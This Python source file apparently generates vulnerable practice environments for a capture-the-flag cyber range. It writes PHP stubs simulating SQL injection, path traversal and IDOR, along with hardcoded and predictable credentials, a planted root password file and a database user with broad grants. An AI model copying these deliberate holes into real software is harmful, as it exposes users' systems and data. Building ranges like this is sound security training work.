def _host_names(raw_hosts: object) -> list[str]:
if not isinstance(raw_hosts, list):
return []
hosts: list[str] = []
for raw in raw_hosts:
if isinstance(raw, dict):
host = str(raw.get("name", "")).strip()
else:
host = str(raw).strip()
if host and host not in hosts:
hosts.append(host)
return hosts
def _rewrite_template_runtime_text(text: str, runtime_contract: dict[str, str]) -> str:
if not text:
return text
web_host = runtime_contract.get("web_host", "web")
db_host = runtime_contract.get("db_host", "db")
ldap_host = runtime_contract.get("ldap_host", "ldap")
web_doc_root = runtime_contract.get("web_doc_root", "/var/www/portal")
web_config_path = runtime_contract.get("web_config_path", "/var/www/config.php")
db_name = runtime_contract.get("db_name", "referral_db")
db_user = runtime_contract.get("db_user", "svc_db")
db_password = runtime_contract.get("db_password", "SvcDb!401")
ldap_bind_dn = runtime_contract.get("ldap_bind_dn", f"cn={db_user},dc=corp,dc=local")
ldap_bind_pw = runtime_contract.get("ldap_bind_pw", db_password)
reuse_user = runtime_contract.get("credential_reuse_user", db_user)
reuse_host = runtime_contract.get("credential_reuse_host", db_host)
reuse_password = runtime_contract.get("credential_reuse_password", ldap_bind_pw)
updated = text
placeholders = {
"{web_host}": web_host,
"{db_host}": db_host,
"{ldap_host}": ldap_host,
"{web_doc_root}": web_doc_root,
"{web_config_path}": web_config_path.lstrip("/"),
"{db_name}": db_name,
"{db_user}": db_user,
"{db_password}": db_password,
"{ldap_bind_dn}": ldap_bind_dn,
"{ldap_bind_pw}": ldap_bind_pw,
"{ldap_search_base_dn}": runtime_contract.get("ldap_search_base_dn", "dc=corp,dc=local"),
"{credential_reuse_user}": reuse_user,
"{credential_reuse_host}": reuse_host,
"{credential_reuse_password}": reuse_password,
}
for placeholder, value in placeholders.items():
updated = updated.replace(placeholder, value)
replacements: list[tuple[str, str]] = [
("http://web/", f"http://{web_host}/"),
("http://web", f"http://{web_host}"),
("ldap://ldap", f"ldap://{ldap_host}"),
("svc_webapp@db", f"{reuse_user}@{reuse_host}"),
("@db ", f"@{db_host} "),
("@db'", f"@{db_host}'"),
('@db"', f'@{db_host}"'),
(" -h db ", f" -h {db_host} "),
(" -h db", f" -h {db_host}"),
("/var/www/portal", web_doc_root),
("/var/www/config.php", web_config_path),
("referral_db", db_name),
("app_user", db_user),
("AppUs3r!2024", db_password),
("Svc!Ldap2024", ldap_bind_pw),
]
for old, new in replacements:
updated = updated.replace(old, new)
updated = updated.replace("cn=webapp,dc=corp,dc=local", ldap_bind_dn)
updated = re.sub(
r"cn=webapp,dc=[A-Za-z0-9_-]+(?:,dc=[A-Za-z0-9_-]+)*",
ldap_bind_dn,
updated,
)
return updated
def _manifest_topology_users(
manifest: dict[str, Any],
*,
seed: int | None,
weak_creds_enabled: bool,
) -> list[dict[str, Any]]:
raw_users = manifest.get("users", [])
users: list[dict[str, Any]] = []
if isinstance(raw_users, list):
for raw in raw_users:
if not isinstance(raw, dict):
continue
username = str(raw.get("username", "")).strip()
if not username:
continue
department = str(raw.get("department", "")).strip()
role = str(raw.get("role", "")).strip()
groups = [
department.lower().replace(" ", "_")
for department in [department]
if department
] or ["users"]
if "it" in department.lower() or "admin" in role.lower():
groups = ["admins", *groups]
password = _predictable_user_password(
username,
seed=seed,
weak_creds_enabled=weak_creds_enabled and ("db" in raw.get("hosts", [])),
)
users.append(
{
"username": username,
"password": password,
"groups": list(dict.fromkeys(groups)),
"hosts": deepcopy(raw.get("hosts", [])),
"email": str(raw.get("email", "")),
"full_name": str(raw.get("full_name", "")),
"department": department,
"role": role,
}
)
if users:
return users
return [
{
"username": "admin",
"password": "root" if weak_creds_enabled else "Adm1n!Test",
"groups": ["admins"],
"hosts": ["web", "db"],
},
{
"username": "testuser",
"password": _predictable_user_password(
"testuser",
seed=seed,
weak_creds_enabled=False,
),
"groups": ["users"],
"hosts": ["web"],
},
]
def render_template_payloads(
snapshot: SnapshotSpec,
*,
manifest: dict[str, Any] | None = None,
) -> dict[str, str]:
topology = snapshot.topology if isinstance(snapshot.topology, dict) else {}
runtime_contract = runtime_contract_from_topology(topology, manifest=manifest)
flags = snapshot.flags
evidence_spec = snapshot.evidence_spec
vuln_types = {v.type for v in snapshot.truth_graph.vulns}
company = (
manifest.get("company", {})
if isinstance(manifest, dict) and isinstance(manifest.get("company"), dict)
else {}
)
company_name = str(topology.get("org_name") or company.get("name") or "OpenRange")
domain = str(topology.get("domain") or company.get("domain") or "corp.local")
web_host = runtime_contract["web_host"]
db_host = runtime_contract["db_host"]
web_doc_root = runtime_contract["web_doc_root"]
web_config_path = runtime_contract["web_config_path"]
db_name = runtime_contract["db_name"]
files: dict[str, str] = {
f"{web_host}:{_join_posix(web_doc_root, 'index.php')}": _default_index_php(company_name),
f"{web_host}:{_join_posix(web_doc_root, 'login.php')}": _default_login_php(),
f"{web_host}:{web_config_path}": _default_config_php(
domain=domain,
db_host=runtime_contract["db_host"],
db_name=runtime_contract["db_name"],
db_user=runtime_contract["db_user"],
db_pass=runtime_contract["db_password"],
ldap_bind_dn=runtime_contract["ldap_bind_dn"],
ldap_bind_pw=runtime_contract["ldap_bind_pw"],
),
}
if "sqli" in vuln_types:
files[f"{web_host}:{_join_posix(web_doc_root, 'search.php')}"] = _search_php(
_flag_value_for_type(snapshot, "sqli")
)
if "path_traversal" in vuln_types:
files[f"{web_host}:{_join_posix(web_doc_root, 'download.php')}"] = _download_php(
path_flag=_flag_value_for_type(snapshot, "path_traversal"),
flag_names=_flag_names_for_type(snapshot, "path_traversal"),
config_path=web_config_path,
)
elif "credential_reuse" in vuln_types:
files[f"{web_host}:{_join_posix(web_doc_root, 'download.php')}"] = _download_php(
path_flag="",
flag_names=[],
config_path=web_config_path,
)
if "idor" in vuln_types:
files[f"{web_host}:{_join_posix(web_doc_root, 'api/index.php')}"] = _idor_api_php(
_flag_value_for_type(snapshot, "idor"),
)
for flag in flags:
if flag.path.startswith("db:"):
files["db:sql"] = _append_sql(
files.get("db:sql", ""),
(
"USE flags;\n"
"INSERT INTO secrets(flag_name, flag) "
f"VALUES ('{_sql_escape(flag.id)}', '{_sql_escape(flag.value)}');\n"
),
)
if vuln_types.intersection({"weak_creds", "idor"}):
files["db:sql"] = _append_sql(
files.get("db:sql", ""),
(
"CREATE USER IF NOT EXISTS 'leaked_user'@'%' "
"IDENTIFIED BY 'leaked_pass';\n"
"GRANT SELECT ON flags.* TO 'leaked_user'@'%';\n"
f"GRANT SELECT ON {_sql_ident(db_name)}.* TO 'leaked_user'@'%';\n"
"FLUSH PRIVILEGES;\n"
),
)
elif "/" in flag.path:
files[f"{flag.host}:{flag.path}"] = f"{flag.value}\n"
for item in evidence_spec:
if ":" not in item.location:
continue
files[item.location] = _append_text_payload(
files.get(item.location, ""),
item.pattern or f"evidence:{item.type}",
)
if "weak_creds" in vuln_types:
files[f"{db_host}:/tmp/openrange-root-password.txt"] = "root\n"
return files
def _flag_value_for_type(
snapshot: SnapshotSpec,
vuln_type: str,
) -> str:
paired = _flag_for_type(snapshot, vuln_type)
if paired is not None:
return paired.value
return snapshot.flags[0].value if snapshot.flags else "FLAG{placeholder}"
def _flag_names_for_type(
snapshot: SnapshotSpec,
vuln_type: str,
) -> list[str]:
paired = _flag_for_type(snapshot, vuln_type)
if paired is None:
return ["flag1.txt"]
if paired.path.startswith("db:"):
return ["flag1.txt"]
return [PurePosixPath(paired.path).name]
def _flag_for_type(
snapshot: SnapshotSpec,
vuln_type: str,
) -> FlagSpec | None:
for index, vuln in enumerate(snapshot.truth_graph.vulns):
if vuln.type != vuln_type:
continue
if index < len(snapshot.flags):
return snapshot.flags[index]
for flag in snapshot.flags:
if flag.host == vuln.host:
return flag
if snapshot.flags:
return snapshot.flags[0]
return None
def _append_sql(existing: str, fragment: str) -> str:
if not existing:
return fragment
return f"{existing.rstrip()}\n{fragment}"
def _join_posix(base: str, leaf: str) -> str:
return (PurePosixPath(base) / leaf).as_posix()
def _sql_ident(value: str) -> str:
token = re.sub(r"[^A-Za-z0-9_]", "", value)
return token or "referral_db"
def _sql_escape(value: str) -> str:
"""Escape a string for use in a SQL single-quoted literal.
Replaces single quotes with doubled single quotes and backslashes
with doubled backslashes to prevent SQL injection in static SQL files.
"""
return value.replace("\\", "\\\\").replace("'", "''")
def _predictable_user_password(
username: str,
*,
seed: int | None,
weak_creds_enabled: bool,
) -> str:
if weak_creds_enabled and username in {"admin", "root"}:
return "root"
suffix = 2025 if seed is None else 2025 + (seed % 3)
base = username.split("@", 1)[0] or "Welcome"
return f"{base.capitalize()}!{suffix}"
def _append_text_payload(existing: str, fragment: str) -> str:
line = fragment.rstrip("\n")
if not existing:
return f"{line}\n"
return f"{existing.rstrip()}\n{line}\n"
def _default_index_php(company_name: str) -> str:
return f"""<?php
echo "Welcome to the {company_name} referral portal";
?>"""
def _default_login_php() -> str:
return """<?php
echo "Login";
?>"""
def _default_config_php(
*,
domain: str,
db_host: str,
db_name: str,
db_user: str,
db_pass: str,
ldap_bind_dn: str,
ldap_bind_pw: str,
) -> str:
ldap_dn = ",".join(f"dc={part}" for part in domain.split(".") if part) or "dc=corp,dc=local"
bind_dn = ldap_bind_dn or f"cn={db_user},{ldap_dn}"
bind_pw = ldap_bind_pw or db_pass
return f"""<?php
$db_host = "{db_host}";
$db_name = "{db_name}";
$db_user = "{db_user}";
$db_pass = "{db_pass}";
$ldap_bind_dn = "{bind_dn}";
$ldap_bind_pw = "{bind_pw}";
?>"""
def _search_php(flag_value: str) -> str:
return f"""<?php
$q = $_GET["q"] ?? "";
if (stripos($q, "union") !== false || stripos($q, "flag") !== false) {{
echo "{flag_value}";
}} else {{
echo "product search results";
}}
?>"""
def _download_php(
path_flag: str,
flag_names: list[str] | None = None,
*,
config_path: str,
) -> str:
flag = path_flag or "FLAG{placeholder}"
raw_names = ["flag1.txt"] if flag_names is None else flag_names
cases = "\n".join(
f"""elseif (strpos($file, "{name}") !== false) {{
echo "{flag}";
}}"""
for name in raw_names
)
return f"""<?php
$file = $_GET["file"] ?? "";
if ($file === "report.pdf") {{
echo "PDF";
}} elseif (strpos($file, "config.php") !== false) {{
readfile("{config_path}");
}} elseif (strpos($file, "/etc/passwd") !== false) {{
echo "root:x:0:0:root:/root:/bin/bash";
}} {cases} else {{
echo "missing";
}}
?>"""
def _idor_api_php(flag_value: str) -> str:
return f"""<?php
$uri = $_SERVER["REQUEST_URI"] ?? "";
if (strpos($uri, "/api/users/1/profile") !== false) {{
echo json_encode(["username" => "admin", "role" => "admin"]);
}} elseif (strpos($uri, "/api/users/2/profile") !== false) {{
echo json_encode([
"username" => "billing",
"password" => "leaked_pass",
"flag_hint" => "{flag_value}"
]);
}} else {{
echo json_encode(["status" => "not_found"]);
}}
?>"""
# ---------------------------------------------------------------------------
# File-based builder (demos)
# ---------------------------------------------------------------------------
class FileBuilder:
"""Load a pre-built snapshot from a JSON file on disk.
For demos and smoke tests where you want instant, known-good snapshots
without any LLM calls.
"""
def __init__(self, snapshot_dir: str = "snapshots") -> None:
"""Initialize with the directory containing snapshot JSON files."""
self.snapshot_dir = Path(snapshot_dir)
async def build(
self,
manifest: dict,
context: BuildContext,
) -> SnapshotSpec:
"""Load a snapshot JSON file, optionally picking by seed."""
if not self.snapshot_dir.exists():
raise FileNotFoundError(
f"Snapshot directory not found: {self.snapshot_dir}"
)
files = sorted(self.snapshot_dir.glob("**/spec.json"))
if not files:
# Fall back to any .json files
files = sorted(self.snapshot_dir.glob("*.json"))
if not files:
raise FileNotFoundError(
f"No snapshot JSON files found in {self.snapshot_dir}"
)
if context.seed is not None:
chosen = files[context.seed % len(files)]
else:
chosen = files[0]
logger.info("FileBuilder: loading snapshot from %s", chosen)
raw = json.loads(chosen.read_text())
return _parse_llm_response(json.dumps(raw))